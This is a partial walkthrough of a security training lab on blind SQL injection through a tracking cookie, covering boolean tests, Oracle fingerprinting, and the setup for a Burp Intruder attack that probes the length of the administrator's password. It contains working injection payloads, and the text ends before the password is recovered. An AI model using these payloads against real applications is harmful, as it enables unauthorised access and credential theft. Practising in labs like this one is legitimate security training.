INFO LAB: →

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a

Welcome back message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

GOAL : → To solve the lab, log in as the administrator user.

Solution : →

1. First we will need how will complete this lab

   we will inject in Cookie in header

   Cookie: TrackingId=pQFLBmaWHcVOPCwl; session=nnp3cylRBFgQfY7em49IpAaoeAEgc18M
   
   

2. let’s try to add single quote and show if response have ‘Welcome back’ in website

   and show the response and we will try to use a payload

   ' AND '1'='1  >> this will give us 200 ok and Welcome back statement
   ' AND '1'='2  >> this will give us 200 ok and don't see Welcome back 
   

So know we know what’s the injected point

1. We need to know what’s the type of database

' || (SELECT '' FROM dual) || ' >> 200 ok >> oracle database

here we go . let’s try to know length of password

choose sniper attack

' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
# i will send it to intruder and make §1§

choose payload type → number

and from : → 0

To → 50 i think it will be less than this number but let’s try

Go To setting >> choose Grep-Extract >> Add >> search about welcome back and choose it

press Start attack